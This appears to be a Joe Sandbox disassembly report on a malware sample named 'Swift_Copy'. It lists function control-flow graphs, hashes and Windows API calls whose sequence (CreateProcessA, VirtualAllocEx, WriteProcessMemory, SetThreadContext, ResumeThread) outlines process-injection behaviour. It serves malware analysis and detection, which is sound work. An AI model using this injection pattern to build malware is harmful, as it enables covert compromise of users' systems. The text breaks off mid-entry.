                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_ab10000_Swift_Copy.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c231cb9fac6065dc000446a552400073b35108da55ce4bd7f6652e6e3c294dff
                            • Instruction ID: 9a94c98712e91506196db60c2dfd32c3fad8ea49e18191b1645a5453ff98f508
                            • Opcode Fuzzy Hash: c231cb9fac6065dc000446a552400073b35108da55ce4bd7f6652e6e3c294dff
                            • Instruction Fuzzy Hash: 8BA0016499E144E59031282920A44B4C06E122F504FC07289834F6358685068448341E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766DA24 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 705 766da24-766dac5 707 766dac7-766dad1 705->707 708 766dafe-766db1e 705->708 707->708 709 766dad3-766dad5 707->709 713 766db57-766db86 708->713 714 766db20-766db2a 708->714 711 766dad7-766dae1 709->711 712 766daf8-766dafb 709->712 715 766dae5-766daf4 711->715 716 766dae3 711->716 712->708 722 766dbbf-766dc79 CreateProcessA 713->722 723 766db88-766db92 713->723 714->713 718 766db2c-766db2e 714->718 715->715 717 766daf6 715->717 716->715 717->712 719 766db30-766db3a 718->719 720 766db51-766db54 718->720 724 766db3e-766db4d 719->724 725 766db3c 719->725 720->713 736 766dc82-766dd08 722->736 737 766dc7b-766dc81 722->737 723->722 726 766db94-766db96 723->726 724->724 727 766db4f 724->727 725->724 728 766db98-766dba2 726->728 729 766dbb9-766dbbc 726->729 727->720 731 766dba6-766dbb5 728->731 732 766dba4 728->732 729->722 731->731 733 766dbb7 731->733 732->731 733->729 747 766dd0a-766dd0e 736->747 748 766dd18-766dd1c 736->748 737->736 747->748 749 766dd10 747->749 750 766dd1e-766dd22 748->750 751 766dd2c-766dd30 748->751 749->748 750->751 752 766dd24 750->752 753 766dd32-766dd36 751->753 754 766dd40-766dd44 751->754 752->751 753->754 757 766dd38 753->757 755 766dd56-766dd5d 754->755 756 766dd46-766dd4c 754->756 758 766dd74 755->758 759 766dd5f-766dd6e 755->759 756->755 757->754 761 766dd75 758->761 759->758 761->761
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0766DC66
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 97ef79c67769aab7f9b828b8e565de78b1aaf1c83ae29269cfe772a205c45e5e
                            • Instruction ID: 7719193c0071b05dcb8c57c015a7d4fda435d2bf6f87e170b1a92f8352c89bbb
                            • Opcode Fuzzy Hash: 97ef79c67769aab7f9b828b8e565de78b1aaf1c83ae29269cfe772a205c45e5e
                            • Instruction Fuzzy Hash: 42A15CB1E0021ADFDF24DF68C844BEDBBB2BF49310F5481AAD809A7240DB749985CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766DA30 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 762 766da30-766dac5 764 766dac7-766dad1 762->764 765 766dafe-766db1e 762->765 764->765 766 766dad3-766dad5 764->766 770 766db57-766db86 765->770 771 766db20-766db2a 765->771 768 766dad7-766dae1 766->768 769 766daf8-766dafb 766->769 772 766dae5-766daf4 768->772 773 766dae3 768->773 769->765 779 766dbbf-766dc79 CreateProcessA 770->779 780 766db88-766db92 770->780 771->770 775 766db2c-766db2e 771->775 772->772 774 766daf6 772->774 773->772 774->769 776 766db30-766db3a 775->776 777 766db51-766db54 775->777 781 766db3e-766db4d 776->781 782 766db3c 776->782 777->770 793 766dc82-766dd08 779->793 794 766dc7b-766dc81 779->794 780->779 783 766db94-766db96 780->783 781->781 784 766db4f 781->784 782->781 785 766db98-766dba2 783->785 786 766dbb9-766dbbc 783->786 784->777 788 766dba6-766dbb5 785->788 789 766dba4 785->789 786->779 788->788 790 766dbb7 788->790 789->788 790->786 804 766dd0a-766dd0e 793->804 805 766dd18-766dd1c 793->805 794->793 804->805 806 766dd10 804->806 807 766dd1e-766dd22 805->807 808 766dd2c-766dd30 805->808 806->805 807->808 809 766dd24 807->809 810 766dd32-766dd36 808->810 811 766dd40-766dd44 808->811 809->808 810->811 814 766dd38 810->814 812 766dd56-766dd5d 811->812 813 766dd46-766dd4c 811->813 815 766dd74 812->815 816 766dd5f-766dd6e 812->816 813->812 814->811 818 766dd75 815->818 816->815 818->818
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0766DC66
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 9552531f5a811fa80ecba77163056db3d9104d264a3539d35d6f9ad2b9a3b8c9
                            • Instruction ID: 5cdabf97dd75b96f97a380bc84ca0751ac91d21fb8629bf50886c74b03fd4477
                            • Opcode Fuzzy Hash: 9552531f5a811fa80ecba77163056db3d9104d264a3539d35d6f9ad2b9a3b8c9
                            • Instruction Fuzzy Hash: CC916CB1E0021ADFDF14DF68C844BEDBBB2BF49310F5481A9D809A7240DB749985CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 018EB117 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 819 18eb117-18eb137 820 18eb139-18eb146 call 18ea44c 819->820 821 18eb163-18eb167 819->821 828 18eb15c 820->828 829 18eb148 820->829 823 18eb17b-18eb1bc 821->823 824 18eb169-18eb173 821->824 830 18eb1be-18eb1c6 823->830 831 18eb1c9-18eb1d7 823->831 824->823 828->821 875 18eb14e call 18eb3c0 829->875 876 18eb14e call 18eb3b1 829->876 830->831 832 18eb1fb-18eb1fd 831->832 833 18eb1d9-18eb1de 831->833 838 18eb200-18eb207 832->838 835 18eb1e9 833->835 836 18eb1e0-18eb1e7 call 18ea458 833->836 834 18eb154-18eb156 834->828 837 18eb298-18eb2c3 834->837 840 18eb1eb-18eb1f9 835->840 836->840 857 18eb2ca-18eb310 837->857 841 18eb209-18eb211 838->841 842 18eb214-18eb21b 838->842 840->838 841->842 843 18eb21d-18eb225 842->843 844 18eb228-18eb231 call 18ea468 842->844 843->844 850 18eb23e-18eb243 844->850 851 18eb233-18eb23b 844->851 852 18eb245-18eb24c 850->852 853 18eb261-18eb26e 850->853 851->850 852->853 855 18eb24e-18eb25e call 18ea478 call 18ea488 852->855 859 18eb270-18eb28e 853->859 860 18eb291-18eb297 853->860 855->853 869 18eb312-18eb358 857->869 859->860 870 18eb35a-18eb35d 869->870 871 18eb360-18eb38b GetModuleHandleW 869->871 870->871 872 18eb38d-18eb393 871->872 873 18eb394-18eb3a8 871->873 872->873 875->834 876->834
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 018EB37E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 8ee089fa721b80fac2644e7fdfe92262ab0563fec3cb36b8f88452c7cca71d20
                            • Instruction ID: fc4e5e5b22592c156cdcb83b51269096adb8ac57b9875aacd63b31788a9a3be6
                            • Opcode Fuzzy Hash: 8ee089fa721b80fac2644e7fdfe92262ab0563fec3cb36b8f88452c7cca71d20
                            • Instruction Fuzzy Hash: 88814570A00B058FD724CF69D48979ABBF5FF8A704F008A29D48AD7B50DB34EA45CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 018E49F0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 877 18e49f0-18e5f69 CreateActCtxA 881 18e5f6b-18e5f71 877->881 882 18e5f72-18e5fcc 877->882 881->882 889 18e5fce-18e5fd1 882->889 890 18e5fdb-18e5fdf 882->890 889->890 891 18e5ff0 890->891 892 18e5fe1-18e5fed 890->892 894 18e5ff1 891->894 892->891 894->894
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 018E5F59
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 056d58202d91c9079d5ea2a4cabb3c236e00e59b4af7c9ac5e20e18aa58143d2
                            • Instruction ID: 6e95b0ea7212c38aa7139d6831a286e2605aa594dd2e20e28c06c36a8cfef170
                            • Opcode Fuzzy Hash: 056d58202d91c9079d5ea2a4cabb3c236e00e59b4af7c9ac5e20e18aa58143d2
                            • Instruction Fuzzy Hash: D141E3B4C0071DCBDB24DFA9C848B9DBBF5BF49308F24806AD508AB255DB756946CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 018E5E9C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 895 18e5e9c-18e5ea1 896 18e5edc-18e5f69 CreateActCtxA 895->896 897 18e5ea3-18e5ed2 895->897 899 18e5f6b-18e5f71 896->899 900 18e5f72-18e5fcc 896->900 897->896 899->900 907 18e5fce-18e5fd1 900->907 908 18e5fdb-18e5fdf 900->908 907->908 909 18e5ff0 908->909 910 18e5fe1-18e5fed 908->910 912 18e5ff1 909->912 910->909 912->912
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 018E5F59
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 00c4a114ef69af79e6b402299eae0c00eff65261f9cb798c4eb38e0bafbb5cd7
                            • Instruction ID: 15f71145a08569f16131bad9c8452640e29cc9fa2f58a70b5a7c10916bd30c21
                            • Opcode Fuzzy Hash: 00c4a114ef69af79e6b402299eae0c00eff65261f9cb798c4eb38e0bafbb5cd7
                            • Instruction Fuzzy Hash: B64114B4C00719CFDB24CFA9C98879DBBF1BF49308F20806AD408AB255DB756946CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 018EB3B1 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 913 18eb3b1-18eb3d6 call 18ea44c 917 18eb3d8-18eb3e9 call 18ea4a4 913->917 918 18eb406-18eb40b 913->918 921 18eb3fd-18eb404 call 18ea4bc 917->921 922 18eb3eb-18eb3f4 call 18ea4b0 917->922 921->918 926 18eb3f9-18eb3fb 922->926 926->918
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 018EB37E
                              • Part of subcall function 018EA4B0: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018EB3F9,00000800,00000000,00000000), ref: 018EB60A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: 94c8246cda84b8605d1faf3c001de3ce5b131b79b822449094903ac8ffc3b874
                            • Instruction ID: 3932e65512d6ff6c5a127e12d9c43c4867275652244316b246a3ccf298c6f6f0
                            • Opcode Fuzzy Hash: 94c8246cda84b8605d1faf3c001de3ce5b131b79b822449094903ac8ffc3b874
                            • Instruction Fuzzy Hash: 64215BB2A00345CFDB20CF69D4493EBBBF5EF87318F19406ADA09D7251D6348906CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766D36B Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 927 766d36b-766d3be 930 766d3c0-766d3cc 927->930 931 766d3ce-766d40d WriteProcessMemory 927->931 930->931 933 766d416-766d446 931->933 934 766d40f-766d415 931->934 934->933
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0766D400
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 02013b461ac7cc9e3a062e392791a699614585fe3847a940bd65cd506b45fd7e
                            • Instruction ID: aadd1194607bb66ae79b272615f53778add7cdffa3b841792a010fbf26560824
                            • Opcode Fuzzy Hash: 02013b461ac7cc9e3a062e392791a699614585fe3847a940bd65cd506b45fd7e
                            • Instruction Fuzzy Hash: C82127B59003199FCF10DFA9C885BEEBBF5FF48310F50842AE919A7250C778A945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766D370 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 938 766d370-766d3be 940 766d3c0-766d3cc 938->940 941 766d3ce-766d40d WriteProcessMemory 938->941 940->941 943 766d416-766d446 941->943 944 766d40f-766d415 941->944 944->943
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0766D400
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 062eeefdcd3c282457a2eb21d1f9c36be0ecfb31cfae7f28f7a9f62a8aa5b421
                            • Instruction ID: c8a4c34596e16ff3dc30c614c3e3e901aab9658560ce9074379fd105a8986eef
                            • Opcode Fuzzy Hash: 062eeefdcd3c282457a2eb21d1f9c36be0ecfb31cfae7f28f7a9f62a8aa5b421
                            • Instruction Fuzzy Hash: F62139B19003199FCF10DFA9C885BEEBBF5FF48310F508429E919A7240C778A944CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766D890 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0766D918
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 6670afe04baf480eba67488509793bf2e9b5fb44ff2e7c5dd2cdefbced910ebd
                            • Instruction ID: 064cc5a4de0e0bf368dd8adf59d41f4f3de19252c81b200afb0935d85ea45280
                            • Opcode Fuzzy Hash: 6670afe04baf480eba67488509793bf2e9b5fb44ff2e7c5dd2cdefbced910ebd
                            • Instruction Fuzzy Hash: 9D2159B1D003499FCB10DFAAC885AEEFBF5FF48320F50842AE559A7250D7389941CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766CD98 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                            Download Yara Rule
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766CE1E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 2893042ab25ba72f2a68a4615b56f72b801f97e6574c184b5018c14d2d867698
                            • Instruction ID: 6f60eed14b6c7e47d97212d09399344a3e07f57a0f19c6144f21ce5a3bcb3978
                            • Opcode Fuzzy Hash: 2893042ab25ba72f2a68a4615b56f72b801f97e6574c184b5018c14d2d867698
                            • Instruction Fuzzy Hash: 2B2157B1D002098FDB10DFAAC4857EEBBF4FF48320F10842AD559A7240CB78A945CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 018ED5FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                            Download Yara Rule
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018ED9D6,?,?,?,?,?), ref: 018EDA97
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 6e4e4ef822b0230ca92a7cbfde56d958cb16b8f6a70920b1fc9c731ebd5f6d30
                            • Instruction ID: 379c8f10ba2c63bbcbc6d6120affac52fe6d6c75cb69f850638eef0cdcbe2c4c
                            • Opcode Fuzzy Hash: 6e4e4ef822b0230ca92a7cbfde56d958cb16b8f6a70920b1fc9c731ebd5f6d30
                            • Instruction Fuzzy Hash: 6321E5B59042099FDB10DF9AD584AEEFBF8EB48310F14851AE914A3350D378AA54CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766CDA0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                            Download Yara Rule
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766CE1E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 1d7be31c8725f2396bd953c0faf2aeb9866c195b31760fff64ba2eb097ae74fa
                            • Instruction ID: f3cb5db578fdcc02fac77d85a366abe2a4763ad0b375bf68cc59d5eb9ccc52a7
                            • Opcode Fuzzy Hash: 1d7be31c8725f2396bd953c0faf2aeb9866c195b31760fff64ba2eb097ae74fa
                            • Instruction Fuzzy Hash: 3B2135B19002098FDB10DFAAC4857EEBBF4EF88324F50842AD559A7240CB78A945CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766D898 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0766D918
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: dbc45cea72dd8451d46e51e0f2e39fc98032b96081441790262934181b591d75
                            • Instruction ID: 46eb49ee62521435d601af8909406c09ebf600b746808979f6131550b8e4f9c6
                            • Opcode Fuzzy Hash: dbc45cea72dd8451d46e51e0f2e39fc98032b96081441790262934181b591d75
                            • Instruction Fuzzy Hash: 9A2139B1D003499FCB10DFAAC884AEEFBF5FF48310F508429E519A7250D7789945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 018EDA08 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018ED9D6,?,?,?,?,?), ref: 018EDA97
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 9ebe05d83eb704aa5dde9774a12d7893415ada765ab723117f562f9d109cdb60
                            • Instruction ID: 0e5cfb9dbb436a8db43c6099bd30e0159241f9091b1f6a6e97687ff3607a0089
                            • Opcode Fuzzy Hash: 9ebe05d83eb704aa5dde9774a12d7893415ada765ab723117f562f9d109cdb60
                            • Instruction Fuzzy Hash: 6121E3B5900208DFDB10CFA9D985ADEBBF4FF08310F14841AE918A7310D378AA44CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766D2AB Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766D31E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 6b6f7e4a01724e2f5b65fd3a02bec52d9937ad968150e8b3f79e804ed8f60911
                            • Instruction ID: 6f8ecfd1b932bf89dee99c28e7bbbd0f02470d07e2a89c7edb6031564385c178
                            • Opcode Fuzzy Hash: 6b6f7e4a01724e2f5b65fd3a02bec52d9937ad968150e8b3f79e804ed8f60911
                            • Instruction Fuzzy Hash: 7B116AB59002499FCB10DFAAC844AEEFFF5EF88320F108419E519A7250CB75A544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 018EA4B0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018EB3F9,00000800,00000000,00000000), ref: 018EB60A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 90994737c2ae726060ebe442dc0ecdda79e933855b01d2811d14ff9437cbacc6
                            • Instruction ID: 7af257f78bd74c28c321547c8e2ba7656d693a2983985dcd189a1ddf1cc2e0d6
                            • Opcode Fuzzy Hash: 90994737c2ae726060ebe442dc0ecdda79e933855b01d2811d14ff9437cbacc6
                            • Instruction Fuzzy Hash: 721114B68003099FDB14CF9AC448BEEFBF4EB49310F14842AE919B7210C379A645CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766D2B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766D31E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 7c18c0f4a270a603b8605a74c656c75676689e313b40febb234680b5df681eaa
                            • Instruction ID: 0e721670fc8ebe6eac60a76f37f11cd83c86d042d5c697cd1daf8cc9c080ad29
                            • Opcode Fuzzy Hash: 7c18c0f4a270a603b8605a74c656c75676689e313b40febb234680b5df681eaa
                            • Instruction Fuzzy Hash: 271137B19002499FCB10DFAAC844AEEFFF5EF48324F108419E519A7250CB79A944CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766CCE8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 677d38c2d69d65a1bda7b8cfa8643ff950228fa32b040296360b148bd9cde124
                            • Instruction ID: 388693e28e22878aa653d6c8e750b65437bdf8a5aa14869aea3caba289e6c451
                            • Opcode Fuzzy Hash: 677d38c2d69d65a1bda7b8cfa8643ff950228fa32b040296360b148bd9cde124
                            • Instruction Fuzzy Hash: CE115BB58006488FCB20DFAAC4457EEFFF5EF48724F108419D559A7650CB79A544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 018EB598 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018EB3F9,00000800,00000000,00000000), ref: 018EB60A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2106243378.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_18e0000_Swift_Copy.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 423f27e147d228412156e82c0a690f5870f69a847f82c326830edc8dac19b5f5
                            • Instruction ID: 56b0ba38129d5a63f4ac57cb453d6c4ff9ce57124f8bd3337a9c65439760b201
                            • Opcode Fuzzy Hash: 423f27e147d228412156e82c0a690f5870f69a847f82c326830edc8dac19b5f5
                            • Instruction Fuzzy Hash: 6D11F3B69002098FDB14CFAAD584BDEFBF5FB49310F10842AE519A7210C379A645CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0766CCF0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2111374314.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7660000_Swift_Copy.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: b6bd2a0fcc18b1024d10e4782e27fe178872bec129eb9e992f1759f0d7324b98
                            • Instruction ID: 01fa78ac5e3004d7ff3163cc4770ea6916cb85b31302c3594db3fc2c9b96779c
                            • Opcode Fuzzy Hash: b6bd2a0fcc18b1024d10e4782e27fe178872bec129eb9e992f1759f0d7324b98
                            • Instruction Fuzzy Hash: C71128B19006498FCB20DFAAC4457EEFBF5EF88724F208419D519A7250CB79A544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0AB1182C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0AB11F0D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2112550232.000000000AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_ab10000_Swift_Copy.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 1c97ccad465923a47cc8627b9e5071445d15d6c4aad2754f11169427516ef662
                            • Instruction ID: e3a24784a7888ff89483ce444133c7d7f764eab7bb653f5c8a7bb03828fb7da6
                            • Opcode Fuzzy Hash: 1c97ccad465923a47cc8627b9e5071445d15d6c4aad2754f11169427516ef662
                            • Instruction Fuzzy Hash: 7511F5B58003499FCB10DF99D484BDEFBF8FB48310F108559EA18A7210C379A944CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0AB11EA8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0AB11F0D
                            Memory Dump Source
